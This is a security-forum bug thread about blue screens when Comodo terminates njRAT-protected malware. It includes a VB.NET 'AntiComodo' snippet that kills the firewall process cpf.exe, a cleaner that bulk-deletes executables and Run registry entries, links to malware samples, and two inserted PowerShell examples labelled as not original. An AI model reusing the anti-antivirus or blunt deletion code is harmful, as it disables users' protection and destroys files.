BSOD Occurs If Malware Process Killed When Sdbxd As Partly Limited [M836]

PM sent.

  1. Disabled Cloud lookup and AV to not get this detected as it was detected by CAV.
  2. Ran it
  3. Launched KS and selected the malware process, hit the “kill process” button, no BSOD.

The test has been done with Sandbox set to Partially Limited, Limited, Restricted, Untrusted, Blocked and FV.

I haven’t gotten any BSOD.

Thanks for testing malware
Possible work “terminate” or “kill process tree”. This is not “kill process”.

Thanks again for the test

I did the same test with “kill process tree” and “terminate” but did not get any BSOD.

Thanks.

Show the blue screen by option "Protect Process BSOD" in program njrat

http://im33.gulfup.com/PITGc.jpg

I hope that the problem will soon be solved :azn:

:o As I said earlier in this topic, the devs will not be able to replicate this without a Complete Dump from a computer which is affected by this. Therefore, as nobody who is able to create and upload a Complete Dump has been able to replicate the BSOD, there is no reason to assume this issue will be fixed.

Please set your computer to create a Complete Dump. Then replicate the BSOD, upload the Complete Dump, and paste a download link to it in your reply. If you have any questions about how to do this please ask. However, remember that unless they get the Complete Dump there is no reason at all to expect that this will be fixed.

Thank you.
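The Complete Dump setup requested above, as an added example that is not part of the original thread: a PowerShell audit of the `CrashControl` registry settings that also checks whether the page file and the dump drive can hold a RAM-sized dump. The 257 MB page-file margin and the `-Apply` switch are assumptions of this sketch.

```powershell
# Added example (not from the thread): audit the crash-dump configuration and,
# with -Apply, switch it to a Complete Memory Dump. Run from an elevated prompt.
param([switch]$Apply)

$key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl'
$types = @{ 0 = 'None'; 1 = 'Complete'; 2 = 'Kernel'; 3 = 'Small (minidump)'; 7 = 'Automatic' }
$cc    = Get-ItemProperty -Path $key

$mode   = [int]$cc.CrashDumpEnabled
$filter = if ($cc.PSObject.Properties.Name -contains 'FilterPages') { [int]$cc.FilterPages } else { 0 }
$label  = if ($types.ContainsKey($mode)) { $types[$mode] } else { "Unknown ($mode)" }
if ($mode -eq 1 -and $filter -eq 1) { $label = 'Active (filtered, not a full Complete Dump)' }

# A complete dump is staged in the page file on the boot volume, so that file
# must hold all of physical RAM. The 257 MB margin is a conservative assumption.
$ramMB = [math]::Ceiling((Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1MB)
$pfMB  = 0
Get-CimInstance Win32_PageFileUsage |
    Where-Object { $_.Name -like "$env:SystemDrive\*" } |
    ForEach-Object { $pfMB += $_.AllocatedBaseSize }   # AllocatedBaseSize is in MB

# The dump file itself also needs RAM-sized free space on its target drive.
$dumpFile = if ($cc.DumpFile) { $cc.DumpFile } else { "$env:SystemRoot\MEMORY.DMP" }
$drive    = Split-Path -Path $dumpFile -Qualifier
$freeMB   = [math]::Floor((Get-CimInstance Win32_LogicalDisk -Filter "DeviceID='$drive'").FreeSpace / 1MB)

[pscustomobject]@{
    DumpType    = $label
    DumpFile    = $dumpFile
    RamMB       = $ramMB
    PageFileMB  = $pfMB
    PageFileOk  = $pfMB -ge ($ramMB + 257)
    DumpDriveOk = $freeMB -ge $ramMB
}

if ($Apply) {
    # 1 = Complete; FilterPages = 0 makes sure it is not the filtered "Active" variant.
    Set-ItemProperty -Path $key -Name CrashDumpEnabled -Value 1 -Type DWord
    Set-ItemProperty -Path $key -Name FilterPages      -Value 0 -Type DWord
    Write-Warning 'Complete Memory Dump enabled. Reboot before reproducing the BSOD.'
}
```

A system-managed page file can report a smaller current size than it is allowed to grow to, so a failed `PageFileOk` check is a prompt to review the page-file settings, not proof that the dump will fail.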

Well, we have a problem with Comodo killing active malicious software like a trojan or backdoor >>
when I put some code like this in my server >> it makes killing it impossible >> and the blue screen of death appears >>
like this

    On Error Resume Next

    For Each p As Process In Process.GetProcessesByName("Process.exe")
        p.Kill()
        p.Close()
    Next

or this

    Sub AntiComodo()
        Dim ktp As Process() = Process.GetProcesses
        Dim i As Integer
        For i = 0 To ktp.Length - 1
            Select Case Strings.LCase(ktp(i).ProcessName)
                Case "cpf.exe"
                    ktp(i).Kill()
                Case Else
            End Select
        Next
    End Sub


This is an example, and there is a lot of code that causes the blue screen of death

and it said: for more information search for: critical process

If you want a sample, I have one >> I can send it to you if you want >
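A pre-termination check for the situation described in this thread, as an added example that is not part of the original posts. It assumes the crash is the "critical process" bugcheck the poster mentions, which Windows raises when a process with the break-on-termination flag set is killed; the function name `Test-CriticalProcess` and the `-ProcessId` parameter are made up for this sketch.

```powershell
# Added example (not from the thread): check the critical-process flag before
# terminating a suspicious process. Read-only; run from an elevated prompt.
param([Parameter(Mandatory)][int]$ProcessId)

Add-Type -Namespace Native -Name Nt -MemberDefinition @'
[DllImport("ntdll.dll")]
public static extern int NtQueryInformationProcess(
    IntPtr process, int infoClass, ref uint info, int length, out int returnLength);
'@

$ProcessBreakOnTermination = 29   # PROCESSINFOCLASS value for the critical flag

function Test-CriticalProcess {
    param([int]$Id)
    $proc = Get-Process -Id $Id -ErrorAction Stop
    try {
        [uint32]$flag = 0
        [int]$returned = 0
        # Opening the handle can itself fail with "Access denied"; the caller reports that.
        $status = [Native.Nt]::NtQueryInformationProcess(
            $proc.Handle, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$returned)
        if ($status -ne 0) { throw ('NtQueryInformationProcess failed: 0x{0:X8}' -f $status) }
        return ($flag -ne 0)
    }
    finally { $proc.Dispose() }
}

try {
    $critical = Test-CriticalProcess -Id $ProcessId
    [pscustomobject]@{
        ProcessId = $ProcessId
        Critical  = $critical
        Advice    = if ($critical) {
            'Do not terminate: killing it will bugcheck the machine. Contain the host and clean up offline.'
        } else {
            'Flag not set: terminating this process should not trigger a critical-process bugcheck.'
        }
    }
}
catch { Write-Warning "Could not query PID ${ProcessId}: $($_.Exception.Message)" }
```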

If you can replicate this, please create a separate bug report for this. The format is given here. Also, set up your computer to create Complete Dumps. Instructions on how to do this are provided here. Let me know if you have any questions.

Thank you.

There is no need for a memory dump because it was shred code that causes the blue screen

:o The devs were unable to replicate it from the sample. Thus, they need the Complete Memory Dump. I don’t know how else to explain this.

As this was not fixed during the Beta testing period I will move this bug report to the main Bug Reporting Board.

Please check and see if this is fixed with the newest version (7.0.313494.4115). Please let us know whether it is fixed or you are still experiencing the problem.

Thank you.

PM sent.

Did not solve the problem >:(

This is a test from a member of the forum zyzoom.net

https://dl.dropboxusercontent.com/s/izicq4psbyueykj/comodo.rar?dl=1&token_hash=AAH9V4GckRRbhCCzvsQKRlNSGMkbkeQO67U_KOspJQtHFw

Thank you for checking this. I have updated the tracker.

Testing was again on samples of malwaretips and the same result
And also if it was run malware detection and anti-viruses and quarantine the blue screen shows and also if I do block and terminate

Has been testing samples of malwaretips

Okay. At this time I have no new information from the devs. Hopefully this will be fixed within the next few updates.

Thanks.

Hi Chiron

I found one in the Forum hacker solution

    ' Coded By ProMax
    ' Requires: Imports Microsoft.Win32 (for RegistryKey)
    Dim SU, AD, TM, UF As String
    SU = Environment.GetFolderPath(Environment.SpecialFolder.Startup)
    TM = My.Computer.FileSystem.SpecialDirectories.Temp
    AD = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
    ' User profile folder: the MyDocuments path with its last 10 characters removed
    UF = Mid(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), 1, Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments).Length - 10)
    ' Kill every process whose executable sits directly in one of these folders.
    ' GetDirectoryName is used in all four tests; the original compared
    ' GetFileName against a folder path in the last three, which never matches.
    For Each x As Process In Process.GetProcesses
        Try
            If IO.Path.GetDirectoryName(x.MainModule.FileName.ToString).ToLower = TM.ToLower Then
                Try : x.Kill() : Catch : End Try
            ElseIf IO.Path.GetDirectoryName(x.MainModule.FileName.ToString).ToLower = AD.ToLower Then
                Try : x.Kill() : Catch : End Try
            ElseIf IO.Path.GetDirectoryName(x.MainModule.FileName.ToString).ToLower = UF.ToLower Then
                Try : x.Kill() : Catch : End Try
            ElseIf IO.Path.GetDirectoryName(x.MainModule.FileName.ToString).ToLower = SU.ToLower Then
                Try : x.Kill() : Catch : End Try
            End If
        Catch : End Try
    Next
    ' Delete .vbs and .exe files from the Temp, AppData and profile folders
    For Each X In IO.Directory.GetFiles(TM)
        If IO.Path.GetExtension(X).ToLower = ".vbs" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
        If IO.Path.GetExtension(X).ToLower = ".exe" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
    Next
    For Each X In IO.Directory.GetFiles(AD)
        If IO.Path.GetExtension(X).ToLower = ".vbs" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
        If IO.Path.GetExtension(X).ToLower = ".exe" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
    Next
    For Each X In IO.Directory.GetFiles(UF)
        If IO.Path.GetExtension(X).ToLower = ".vbs" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
        If IO.Path.GetExtension(X).ToLower = ".exe" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
    Next
    ' Startup folder: delete .vbs files and anything with a file name longer than 20 characters
    For Each X In IO.Directory.GetFiles(SU)
        If IO.Path.GetExtension(X).ToLower = ".vbs" Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
        If IO.Path.GetFileName(X).Length > 20 Then
            Try : System.IO.File.Delete(X) : Catch : End Try
        End If
    Next
    ' Remove HKCU Run values whose name is longer than 15 characters
    Dim regKey As RegistryKey = My.Computer.Registry.CurrentUser.OpenSubKey("software\microsoft\windows\currentversion\run", True)
    For Each x As String In regKey.GetValueNames
        If x.Length > 15 Then
            regKey.DeleteValue(x)
        End If
    Next

I’m not sure what this is for? Please provide more background information.

Thanks.

Is the currency in software vb.net to delete and kill malware protected BSOD

Such a tool
http://www.gulfup.com/?eVEtGk